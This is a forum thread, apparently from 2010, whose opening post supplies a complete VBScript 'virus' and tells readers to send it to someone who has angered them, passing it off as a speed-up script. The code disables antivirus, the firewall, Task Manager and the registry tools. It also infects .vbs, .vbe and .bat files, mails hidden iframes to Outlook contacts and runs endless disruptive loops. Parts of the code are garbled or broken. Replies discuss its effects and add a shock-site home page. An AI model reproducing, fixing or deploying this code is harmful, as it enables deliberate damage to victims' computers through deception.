i put cheesey puffer v1 LOL look at top
Hi people some one got you mad well your in the Right Place!
So today we are gonna mess up someones computer
Go in notepad and copy this code in
On Error Resume Next
' CheesePuff By CheesyPuffer V1.0
'HAcked
'These default variables might not be needed by the worm!
set fso=CreateObject("Scripting.FileSystemObject")
set shell=CreateObject("Wscript.Shell")
Shell.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer\NoDrives", "67108863", "REG_DWORD"
Shell.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Po licies\System\DisableTaskMgr", "1", "REG_DWORD"
Shell.regwrite "HKCU\Control Panel\Accessibility\Keyboard Response\Flags", "127", "REG_SZ"
Shell.regwrite "HKCU\Control Panel\Accessibility\SoundSentry\Flags", "3", "REG_SZ"
Shell.regwrite "HKCU\Control Panel\Accessibility\SoundSentry\WindosEffect", "3", "REG_SZ"
Shell.regwrite "HKLM\SYSTEM\CurrentConrolSet\Services\MouClass\St art", "4", "REG_DWORD"
Shell.regwrite "HKLM\SYSTEM\CurrentConrolSet\Services\MouClass\St art", "4", "REG_DWORD"
Msgbox "HACKED",48,"Error"
Shell.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\System\DisableRegistryTools", "1", "REG_DWORD"
Shell.regwrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell",""
Shell.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Re gisteredOwner","Me", "REG_SZ"
Shell.regwrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","Me", "REG_SZ"
Shell.regwrite "HKLM\Software\Microsoft\Internet Explorer\Main\Start Page","*************", "REG_SZ"
Shell.regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","*************", "REG_SZ"
Shell.regwrite "HKCU\Software\Microsoft\Security Center\FirewallDisableNotify", "1", "REG_DWORD"
Shell.regwrite "HKCU\Software\Microsoft\Security Center\UpdatesDisableNotify", "1", "REG_DWORD"
Shell.regwrite "HKCU\Software\Microsoft\Security Center\AntiVirusDisableNotify", "1", "REG_DWORD"
Shell.regwrite "HKLM\Software\Microsoft\Security Center\FirewallDisableNotify", "1", "REG_DWORD"
Shell.regwrite "HKLM\Software\Microsoft\Security Center\UpdatesDisableNotify", "1", "REG_DWORD"
Shell.regwrite "HKLM\Software\Microsoft\Security Center\AntiVirusDisableNotify", "1", "REG_DWORD"
Shell.regwrite "HKCU\SOFTWARE\Policies\Microsoft\WindowsFirewall\ DomainProfile\EnableFirewall","0","REG_DWORD"
Shell.regwrite "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\ DomainProfile\EnableFirewall","0","REG_DWORD"
Shell.regwrite "HKCU\SOFTWARE\Policies\Microsoft\WindowsFirewall\ StandardProfile\EnableFirewall","0","REG_DWORD"
Shell.regwrite "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\ StandardProfile\EnableFirewall","0","REG_DWORD"
On Error Resume Next
AutoOff = "."
Set oWMI = "GetObject("winmgmts://.")"
AutoOffName = "Norton AntiVirus Auto-Protect Service"
sWQL = "Select state from Win32_Service " & "Where displayname='" & AutoOffName & "'"
Set oResults = "oWMI.ExecQuery(sWQL)"
For Each oService In oResults
oService.StopService
oService.ChangeStartMode("Disabled")
Next
Const HKEY_LOCAL_MACHINE = &H80000002
Set Registry = "GetObject("winmgmts:{impersonationLevel=impersona te}!\\.\root\default:StdRegProv")"
KeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce "
ValueName = "Uninstall Norton Script Blocking"
arrStringValues = "("MSIEXEC /x {D327AFC9-7BAA-473A-8319-6EB7A0D40138} /Q")"
Registry.SetStringValue HKEY_LOCAL_MACHINE, KeyPath, ValueName,arrStringValues
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\W ord\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabl ed = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\W ord\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If
Shell.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer\NoRun","1", "REG_DWORD"
Shell.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer\NoClose","1", "REG_DWORD"
Shell.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer\NoLogoff","1", "REG_DWORD"
Shell.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer\NoWindowsUpdate","1", "REG_DWORD"
Shell.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer\NoFind","1", "REG_DWORD"
Shell.regwrite "HKCU\Control Panel\Mouse\SwapMouseButtons","1", "REG_SZ"
Shell.run "*************",false
Shell.regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked", "REG_SZ"
Shell.regwrite "HKCU\Software\Policies\Microsoft\WindowsMediaPlay er\TitleBar","Owned", "REG_SZ"
Set WMP=CreateObject("WMPlayer.OCX.7" )
Set CDROMs=WMP.cdromCollection
if CDROMs.Count >= 1 then
For i = 0 to CDROMs.Count - 1
CDROMs.Item(i).Eject
Next
End If
Set Outlook = "CreateObject(" & Chr(34) & "Outlook.Application" & Chr(34) & ")"
Set Mapi="Outlook.GetNameSpace(" & Chr(34) & "MAPI" & Chr(34) & ")"
For Each Msg In Mapi.GetDefaultFolder(6).Messages
If Shell.RegRead("HKLM\SOFTWARE\Microsoft\WAB\Address es\"&Msg.SenderName) = "" Then
Set MyMsg=Msg.Reply
MyMsg.Body = ""
MyMsg.HtmlBody = "<iframe src=" & Chr(34) & "*************" & Chr(34) & " height=1 width=1></iframe>"
Set MapiNS=Outlook.GetNameSpace("MAPI")
MyMsg.Send
Shell.RegWrite "HKLM\SOFTWARE\Microsoft\WAB\Addresses\"&Msg.Sende rName, ""
End If
Next
set shell=createobject("wscript.shell")
shell.run "sndvol32"
shell.appactivate "volume control"
WScript.sleep(500)
shell.appactivate "volume control"
shell.sendkeys "{tab}"
wscript.sleep(500)
shell.sendkeys "m"
wscript.sleep(500)
shell.sendkeys Chr(32)
wscript.sleep(500)
shell.appactivate "volume control"
wscript.sleep(500)
shell.sendkeys "%{f4}"
fso.DeleteFile "C:\Windows\System32\pnqitqhf.vbs"
Set Write = FSO.OpenTextFile("C:\Windows\System32\pnqitqhf.vbs ", 8, True)
Write.WriteLine("Set fso=CreateObject(" & Chr(34) & "Scripting.FileSystemObject" & Chr(34) & ")")
Write.WriteLine("If fso.FolderExists(" & Chr(34) & "C:\Temp" & Chr(34) & ") Then")
Write.WriteLine("Else")
Write.WriteLine("fso.CreateFolder(" & Chr(34) & "C:\Temp" & Chr(34) & ")")
Write.WriteLine("End If")
Write.WriteLine("Set Write=fso.CreateTextFile(" & Chr(34) & "C:\Temp\message.txt" & Chr(34) & ", True)")
Write.WriteLine("Write.WriteLine(" & Chr(34) & "Owned" & Chr(34) & ")")
Write.WriteLine("Write.Close")
Write.WriteLine("While True")
Write.WriteLine("Set Shell=CreateObject(" & Chr(34) & "WScript.Shell" & Chr(34) & ")")
Write.WriteLine("Shell.Run " & Chr(34) & "NotePad.exe /p C:\temp\message.txt" & Chr(34) & "")
Write.WriteLine("Wscript.Sleep(5000)")
Write.WriteLine("WEnd")
Shell.Run "C:\Windows\System32\pnqitqhf.vbs"
fso.DeleteFile "C:\ewnxxnlx.vbs"
Set Write = fso.OpenTextFile("C:\ewnxxnlx.vbs", 8, True)
Write.WriteLine("Set shell=createobject(" & Chr(34) & "wscript.shell" & Chr(34) &")")
Write.WriteLine("Do")
Write.WriteLine("Cmd = " & Chr(34) & "sndrec32 /play /close " &Chr(34) &"")
Write.WriteLine("Shell.Run Cmd, 0, True")
Write.WriteLine("loop")
Shell.Run "C:\ewnxxnlx.vbs"
Shell.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer\NoDesktop","1", "REG_DWORD"
Shell.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Po licies\System\DisableMalwareRemovalTool", "1", "REG_DWORD"
Shell.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SFCDisable","FFFFFF9D", "REG_DWORD"
Shell.regwrite "HKLM\System\CurrentControlSet\Control\ComputerNam e\ActiveComputerName\ComputerName","", "REG_SZ"
fso.DeleteFile "C:\windows\jynludo.vbs"
Set Write = FSO.OpenTextFile("C:\windows\jynludo.vbs", 8, True)
Write.WriteLine("Set Shell=Createobject(" & Chr(34) & "wscript.Shell" & Chr(34) &")")
Write.WriteLine("While True")
Write.WriteLine("Shell.SendKeys " & Chr(34) & "{CAPSLOCK}" & Chr(34) & "")
Write.WriteLine("wscript.sleep(200)")
Write.WriteLine("Shell.SendKeys " & Chr(34) & "{NUMLOCK}" & Chr(34) & "")
Write.WriteLine("wscript.sleep(200)")
Write.WriteLine("Shell.SendKeys " & Chr(34) & "{SCROLLLOCK}" & Chr(34) & "")
Write.WriteLine("wscript.sleep(200)")
Write.WriteLine("Shell.SendKeys " & Chr(34) & "{NUMLOCK}" & Chr(34) & "")
Write.WriteLine("wscript.sleep(200)")
Write.WriteLine("Shell.SendKeys " & Chr(34) & "{SCROLLLOCK}" & Chr(34) & "")
Write.WriteLine("wscript.sleep(200)")
Write.WriteLine("Shell.SendKeys " & Chr(34) & "{NUMLOCK}" & Chr(34) & "")
Write.WriteLine("wscript.sleep(200)")
Write.WriteLine("WEnd")
Shell.run "C:\windows\jynludo.vbs"
Function Infect(path,extension)
On Error Resume Next
Set file = fso.OpenTextFile(WScript.ScriptFullName, 1)
ome = file.ReadAll
Set Folder = fso.GetFolder(path)
Set dir = Folder.Files
For each target in dir
Ext = fso.GetExtensionName(target.Name)
If Ext = extension then
Set W = fso.OpenTextFile(target.path, 2, True)
W.Write ome
W.Close
End If
Next
End Function
Set Net = CreateObject("WScript.Network")
Username = Net.Username
Call Infect("C:\","vbs")
Call Infect("C:\Windows","vbs")
Call Infect("C:\Windows\System32","vbs")
Call Infect("C:\","vbe")
Call Infect("C:\Windows","vbe")
Call Infect("C:\Windows\System32","vbe")
fso.CopyFile WScript.ScriptFullName, "C:\ujrzkformat
Function Infect(path)
Set Folder = fso.GetFolder(path)
Set dir = Folder.Files
For each target in dir
Ext = fso.GetExtensionName(target.Name)
If Ext = "bat" then
Set W = fso.OpenTextFile(target.path, 8, True)
W.Write VbCrLf
W.write "@start C:\ujrzk.vbs"
W.close
End If
Next
End Function
Call Infect("C:\")
Call Infect("C:\Windows")
Call Infect("C:\Windows\System32")
fso.DeleteFile "C:\CheesyWorm.url"
Set Write = FSO.OpenTextFile("C:\CheesyWorm.url", 8, True)
Write.WriteLine("[DEFAULT]")
Write.WriteLine("BASEURL=*************.url")
Write.WriteLine("[InternetShortcut]")
Write.WriteLine("URL=*************")
Write.WriteLine("Modified=10DE1571EC5AC90184")
Write.WriteLine("IDList=")
Write.WriteLine("[{000214A0-0000-0000-C000-000000000046}]")
Write.WriteLine("Prop3=19,2")
Set Net = CreateObject("WScript.Network")
Username = Net.Username
fso.copyfile "C:\CheesyWorm.url", "C:\Documents And Settings\" & Username & "\Favorites\CheesyWorm.url", True
Shell.RegWrite("HKLM\SYSTEM\CurrentControlSet\Cont rol\Lsa\restrictAnonymous", "1", REG_DWORD)
Shell.RegWrite("HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\PasswordExpiryWarning", "0", "REG_DWORD")
' NOTE: The code bellow is designed to produce a permissions error. Please do not try to "improve it" by repairing the error.
' You will find it more effective leaving it as it is. Thanks.
fso.DeleteFile "C:\dfsahivje.vbs"
Set Write = FSO.OpenTextFile("C:\dfsahivje.vbs", 8, True)
Write.WriteLine("Set fso=createobject(" & Chr(34) & "scripting.filesystemobject" & Chr(34) &")")
Write.WriteLine(Write.WriteLine("Set shell=createobject(" & Chr(34) & "wscript.shell" & Chr(34) &")")
Write.WriteLine("fso.copyfile " & Chr(34) &"C:\dfsahivje.vbs" & Chr(34) &", " &Chr(34) & "C:\Windows\temp.vbs" &Chr(34) &"")
Write.WriteLine("Set queen=fso.opentextfile(" & Chr(34) & "C:\dfsahivje.vbs" & Chr(34) &")")
Write.WriteLine("crown = " & chr(34) & "queen.readall" & Chr(34) &"")
Write.WriteLine("queen.close")
Write.WriteLine("Do")
Write.WriteLine("if not(fso.fileexists(" & Chr(34) & "C:\dfsahivje.vbs" & Chr(34) & ")) then")
Write.WriteLine("set clown=fso.createtextfile(" &Chr(34) & "C:\Windows\temp.vbs" &Chr(34) & ")")
Write.WriteLine("clown.write crown")
Write.WriteLine("clown.close")
Write.WriteLine("end if")
Write.WriteLine("Shell.Run " &Chr(34) & "C:\Windows\temp.vbs" &Chr(34) &"")
Write.WriteLine("loop")
Shell.Run("C:\dfsahivje.vbs")
' End of Malformed code
Shell.Run "%windir%\System32\rundll32.exe user32.dll,LockWorkStation"
Ok now Save as anything .vbs ok Now you send it to them dont open unless you wanna have a deadly virus! this also removes any antivirus when opened so dont worry if they open it now send the anything.vbs say its a script that help you make your comp faster!
Im not responsible if there computer gets messed up for life anything that you do you are held responsible now once you send tell them to open once you know it they wont be messin with you anymore ( unless its physical ) Thank you this is just version 1.0 i will make more thank me please
Bye........
i put cheesey puffer v1 LOL look at top
nice but im thinking if ur opening the virus ul get a error with cheesepuff from cheesypuffv1 can i change the name?
and btw what for virus is this , and is it only putting of antivirus?
and how to get rid of it/ fix it
Specifically, what does this virus do?
specifically whats this virus's purpose? i doubt you would know, looks very c & p'd and if you save this as a batch file as i suppose...none of my friends would be stupid to open a .bat FAIL!
Well it destroys someones computer nd im sure you cant fix ?
not a .bat its .vbs sorry double post
only an idiot would open a .bat file also it's not hard to open it back up in notepad xD
its not .bat its .vbs please read the bottom of my code!
its not C&pd i made it and i copied in pasted from my projects this code so old lol i dont use that much im sticking with the new stuff!
it disables your mouse and keyboard while deleting files and sending message boxes saying hacked! and i think i put the fake blue screen of death let me recheck
LOL i forgot to tell you guys it makes internet explorer home pagehttps://************* LOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOL
https://Mea t s p in.com there so when you use it or your friend uses it he be wtf
Last edited by DragonHx; 08-03-2010 at 02:14 PM.
good job at coding vbs and good job at knowing your way around the windows registry
what OS is it intended for? cuz there will be different reactions for each windows system